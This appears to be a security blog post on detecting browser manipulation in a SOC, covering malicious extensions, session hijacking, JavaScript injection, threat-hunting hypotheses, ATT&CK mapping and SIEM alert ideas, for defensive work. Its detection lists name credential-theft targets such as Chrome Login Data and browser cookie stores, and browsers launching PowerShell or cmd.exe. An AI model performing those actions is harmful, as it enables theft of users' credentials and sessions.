Detecting Browser Manipulation in the SOC
Detecting Browser Manipulation in the SOC
Preventive controls are essential, but organizations must assume some browser-based attacks will bypass initial defenses. Security Operations Centers (SOCs) should develop detection strategies that focus on identifying abnormal browser behavior, suspicious authentication activity, and indicators of session compromise.
Monitor Browser Extension Activity
Browser extensions are one of the most common attack vectors for browser manipulation.
Security teams should monitor for:
Installation of unauthorized extensions
Extensions requesting excessive permissions
Recently published or low-reputation extensions
Extension updates originating from unexpected sources
Users installing multiple extensions in a short period
Potential indicators include:
Browser processes spawning unexpected child processes
Connections to newly registered domains
Access to credential stores
Unusual browser storage modifications
Detect Session Hijacking
Session hijacking often leaves subtle indicators within authentication logs.
Monitor for:
Impossible travel events
Concurrent sessions from geographically distant locations
Changes in browser fingerprints during active sessions
Authentication token reuse across multiple IP addresses
Sudden privilege escalation after login
Cloud providers and Identity Providers (IdPs) frequently provide telemetry that can detect these anomalies.
Identify Browser-Based Credential Theft
Credential theft activity often occurs before account compromise.
Look for:
Access to browser credential databases
Attempts to read browser cookie stores
Access to local authentication tokens
Credential dumping tools targeting browser profiles
Processes interacting with browser memory
Examples include access to:
Chrome Login Data database
Chromium cookie stores
Firefox credential storage files
Browser profile directories
Monitor DNS and Web Traffic
Network telemetry can reveal browser manipulation activity that may not be visible on endpoints.
Useful indicators include:
Communication with newly registered domains
Excessive redirects
Connections to known phishing infrastructure
Browser traffic to command-and-control servers
Repeated requests to suspicious JavaScript resources
Organizations should enrich DNS logs with threat intelligence feeds to identify emerging threats.
Detect Malicious JavaScript Activity
JavaScript injection attacks frequently generate observable indicators.
Monitor web application logs for:
Unexpected script execution
Inline JavaScript where none previously existed
Suspicious DOM modifications
Unauthorized form changes
Repeated XSS payload attempts
Web Application Firewalls (WAFs) can provide valuable telemetry for detecting these events.
Monitor for Browser Process Abuse
Man-in-the-Browser malware often manipulates browser processes directly.
Indicators may include:
Code injection into browser processes
Browser memory modification
Browser processes launching PowerShell or command shells
Unusual DLL loads
Browser processes communicating with unknown external destinations
Modern EDR solutions are particularly effective at detecting these behaviors.
Threat Hunting for Browser Manipulation
Proactive threat hunting can identify attacks before they result in a significant impact.
Sample hunting hypotheses include:
Hunt #1: Unauthorized Browser Extensions
Hypothesis: A user has installed a malicious extension to harvest credentials.
Search for:
Newly installed extensions
Rare extensions across the enterprise
Extensions requesting broad permissions
Users with extension installation activity followed by authentication anomalies
Hunt #2: Stolen Session Tokens
Hypothesis: An attacker is using a stolen authentication token.
Search for:
Simultaneous logins from different locations
Changes in user-agent strings during active sessions
Token reuse from multiple IP addresses
Access from anonymous VPN providers
Hunt #3: Browser-Based Malware
Hypothesis: Malware is actively manipulating browser activity.
Search for:
Browser process injections
Unusual browser child processes
Browser memory access events
Connections to known malicious infrastructure
Hunt #4: Browser-in-the-Browser Attacks
Hypothesis: Users are interacting with fraudulent authentication windows.
Search for:
Authentication attempts from previously unseen domains
User reports of unusual login prompts
High volumes of failed authentication attempts
New phishing domains targeting corporate applications
MITRE ATT&CK Mapping
Many browser manipulation techniques align with known MITRE ATT&CK techniques:
| Technique | ATT&CK ID |
|---|---|
| Browser Session Cookie Theft | T1539 |
| Steal Web Session Cookie | T1539 |
| Input Capture | T1056 |
| Browser Extensions | T1176 |
| JavaScript Injection | T1059.007 |
| Credential Access from Browsers | T1555 |
| Web Protocol Abuse | T1071.001 |
| Phishing for Information | T1598 |
| Adversary-in-the-Middle | T1557 |
Mapping detections to ATT&CK techniques helps organizations measure coverage and identify visibility gaps.
Example SIEM Detection Use Cases
Organizations using platforms such as Graylog, Splunk, Microsoft Sentinel, Elastic, or QRadar can create detection content for:
High-Risk Browser Activity
Alert when:
A browser launches PowerShell
A browser launches cmd.exe
A browser launches scripting engines
Suspicious Authentication Activity
Alert when:
A session changes geographic location within an impossible time frame
Multiple IP addresses use the same session token
MFA is bypassed after a successful login
Browser Extension Monitoring
Alert when:
Unauthorized extensions are installed
Extensions request elevated permissions
Extensions communicate with suspicious domains
Phishing Infrastructure Detection
Alert when:
Users access newly registered domains
DNS requests resolve to known phishing infrastructure
Login pages imitate corporate SaaS providers
These detections provide valuable visibility into attacks that may otherwise evade traditional perimeter defenses.
Comments
Post a Comment
Got something to say? Drop a comment below — let’s chat!